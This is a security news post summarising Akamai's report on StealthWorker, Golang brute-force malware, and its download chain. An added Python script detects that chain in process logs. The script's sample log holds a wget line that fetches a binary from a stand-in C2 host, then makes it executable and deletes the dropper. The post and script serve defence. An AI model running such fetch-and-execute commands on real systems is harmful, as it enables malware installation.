The security experts at Akamai Security Intelligence and Threat Research have come across malware that can target Windows and Linux systems.

The malware is written in Golang. Once a system is infected with this malware, the attackers then use it to probe other targets in order to spread and continue their brute force operations.

Image: The uploader script used by the attackers allows files to be downloaded by POST requests or directly via URL.

According to the report, StealthWorker can run brute force attacks against many popular web services and platforms, including cPanel/WHM, WordPress, Drupal, Joomla, OpenCart, Magento, MySQL, PostgreSQL, Brixt, SSH and FTP.

Once initialized, the uploader script connects to a VPS acting and downloads a second script, which acts as the downloader. This downloader retrieves a binary from the command and control (C2) server, choosing it according to the output of LONG_BIT, which determines the server's architecture. Finally, when the binary retrieval is complete, the downloader script is deleted.
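The chain described above (architecture probe, binary download, script deletion) leaves an ordered trail in process-execution logs that defenders can hunt for. The following is an added example, not code from the Akamai report or this page: the log layout, account names, hosts and paths are constructed, and it assumes the probe appears as `getconf LONG_BIT` and the download as `wget` or `curl`.

```python
import shlex

# Constructed sample records; the "epoch user command" layout is a hypothetical format.
SAMPLE_LOG = """\
1591000000 www-data getconf LONG_BIT
1591000002 www-data wget -q http://c2.example.invalid/bin64 -O /tmp/.x
1591000003 www-data chmod +x /tmp/.x
1591000005 www-data rm -f /tmp/dl.sh
1591000900 deploy curl -sO https://mirror.example.invalid/pkg.tgz
1591000905 deploy rm -f pkg.tgz
"""

STAGES = ("arch_probe", "fetch", "cleanup")
TOOLS = {"wget": "fetch", "curl": "fetch", "rm": "cleanup", "unlink": "cleanup"}

def classify(cmdline):
    """Map one command line to a stage of the chain, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a logged command line
        argv = cmdline.split()
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    if tool == "getconf":
        return "arch_probe" if "LONG_BIT" in argv[1:] else None
    return TOOLS.get(tool)

def find_chains(log_text, window=60):
    """Return (user, first_ts, last_ts) per in-order chain completed within `window` s."""
    progress, hits = {}, []  # progress: user -> (next stage index, chain start time)
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue
        ts, user, stage = int(parts[0]), parts[1], classify(parts[2])
        idx, start = progress.get(user, (0, None))
        if start is not None and ts - start > window:
            idx, start = 0, None  # chain went stale
        if stage == "arch_probe":
            idx, start = 1, ts
        elif idx and stage == STAGES[idx]:
            idx += 1
        if idx == len(STAGES):
            hits.append((user, start, ts))
            idx, start = 0, None
        progress[user] = (idx, start)
    return hits
```

A download followed by a delete with no preceding architecture probe, as in the `deploy` lines, is not reported; only the full ordered sequence from one account inside the time window is.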

Botnets like these prey on weak authentication measures and automation in order to infiltrate servers and infect them with malware. This is why it is important to use multi-factor authentication and robust password policies.

If you want to read more about this report, read here: https://blogs.akamai.com/sitr/2020/06/stealthworker-golang-based-brute-force-malware-still-an-active-threat.html

By Siddhant Pathak

Cyber security architect, 7+ years experience in cyber security industry, Tech savvy, Nature lover, Bullet 350 rider
